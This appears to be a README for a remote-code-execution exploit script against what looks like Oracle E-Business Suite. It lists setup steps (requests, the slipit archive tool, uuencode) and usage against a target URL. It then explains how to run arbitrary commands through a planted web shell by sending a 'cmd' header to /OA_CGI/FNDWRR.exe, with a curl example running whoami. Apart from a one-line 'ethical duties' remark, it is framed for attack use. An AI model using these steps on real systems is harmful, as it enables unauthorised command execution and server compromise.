Prerequirement for this exploit to run:
- python3 including module (requests, os, sys, slipit)
- uuencode
Before you run, make sure to use for only on ethical duties
if the exploit Fail to run:
- Make sure you already install the pre req module
install requests
-
pip3 install requests
-
Install slipit, git clone https://github.com/usdAG/slipit
- cd slipit
- python3 setup.py sdist
- pip3 install --user dist/* OR python3 -m pip install --user dist/*
-
Install uuencode
- sudo apt install sharutils
-
Usage : python3 exploit.py http://target.com
- then the shell will poping up OR you can also execute the shell using curl or web proxies tools(burpsuite)
- using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
- using burpsuite: Just adding
cmdin header request with any bash payload you want execute